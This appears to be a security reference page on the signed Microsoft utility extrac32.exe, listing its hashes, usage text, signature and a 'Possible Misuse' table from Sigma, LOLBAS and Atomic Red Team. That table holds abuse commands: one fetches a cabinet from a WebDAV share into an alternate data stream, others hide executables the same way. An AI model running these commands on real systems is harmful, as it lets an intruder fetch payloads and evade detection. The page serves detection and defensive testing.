extrac32.exe

File Path: C:\WINDOWS\system32\extrac32.exe
Description: Microsoft CAB File Extract Utility

Hashes

Type	Hash
MD5	`EEBADE0CB17D75DCEF4CD47723821353`
SHA1	`20B3472C531F78572E98BC052C2ABB91CF947758`
SHA256	`5B6D5384EF38930464B2EA0A915F1D305B2DDB054AE404EA0F3C3F5C659B7086`
SHA384	`4DD17979A5863E53C25D42E0E9AA533D3B0802690B83F10D1907DDE6CA38C678DD45C8B58030AAE7D11E9CED5CD22BE8`
SHA512	`47B0C77119B7F26F90A77BD4604CA21DBF88362F64163AA3EA31110CEC83C61AA5BF732F91460D63B9974CD0713DE23EE203F6E733196F3BFA0958F2C3D77700`
SSDEEP	`768:7GR0UuK1Zbss7rFLxUe6FVlpMdcjzf1oDxeaP6MqBz2IdwrA:AT7s8xLxMmdcjzf1exeqABzLqrA`

Runtime Data

Usage (stdout):

Microsoft (R) Cabinet Extraction Tool
Copyright (c) Microsoft Corporation. All rights reserved..

EXTRACT [/Y] [/A] [/D | /E] [/L dir] cabinet [filename ...]
EXTRACT [/Y] source [newname]
EXTRACT [/Y] /C source destination

  cabinet  - Cabinet file (contains two or more files).
  filename - Name of the file to extract from the cabinet.
             Wild cards and multiple filenames (separated by
             blanks) may be used.

  source   - Compressed file (a cabinet with only one file).
  newname  - New filename to give the extracted file.
             If not supplied, the original name is used.

  /A         Process ALL cabinets.  Follows cabinet chain
             starting in first cabinet mentioned.
  /C         Copy source file to destination (to copy from DMF disks).
  /D         Display cabinet directory (use with filename to avoid extract).
  /E         Extract (use instead of *.* to extract all files).
  /L dir     Location to place extracted files (default is current directory).
  /Y         Do not prompt before overwriting an existing file.

Signature

Status: Signature verified.
Serial: 3300000266BD1580EFA75CD6D3000000000266
Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

Original Filename: extrac32.exe.mui
Product Name: Microsoft Windows Operating System
Company Name: Microsoft Corporation
File Version: 5.00 (WinBuild.160101.0800)
Product Version: 5.00
Language: English (United States)
Legal Copyright: Microsoft Corporation. All rights reserved.

File Similarity (ssdeep match)

File	Score
C:\Windows\system32\extrac32.exe	43

Possible Misuse

The following table contains possible examples of extrac32.exe being misused. While extrac32.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source	Source File	Example	License
sigma	proc_creation_win_lolbas_extrac32.yml	`title: Suspicious Extrac32 Execution`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32.yml	`description: Download or Copy file with Extrac32`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32.yml	`- https://lolbas-project.github.io/lolbas/Binaries/Extrac32/`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32.yml	`- extrac32.exe`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32_ads.yml	`title: Suspicious Extrac32 Alternate Data Stream Execution`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32_ads.yml	`- https://lolbas-project.github.io/lolbas/Binaries/Extrac32/`	DRL 1.0
sigma	proc_creation_win_lolbas_extrac32_ads.yml	`- extrac32.exe`	DRL 1.0
LOLBAS	Extrac32.yml	`Name: Extrac32.exe`
LOLBAS	Extrac32.yml	`- Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe`
LOLBAS	Extrac32.yml	`- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe`
LOLBAS	Extrac32.yml	`- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt`
LOLBAS	Extrac32.yml	`- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe`
LOLBAS	Extrac32.yml	`- Path: C:\Windows\System32\extrac32.exe`
LOLBAS	Extrac32.yml	`- Path: C:\Windows\SysWOW64\extrac32.exe`
atomic-red-team	T1564.004.md	extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe	MIT License. © 2018 Red Canary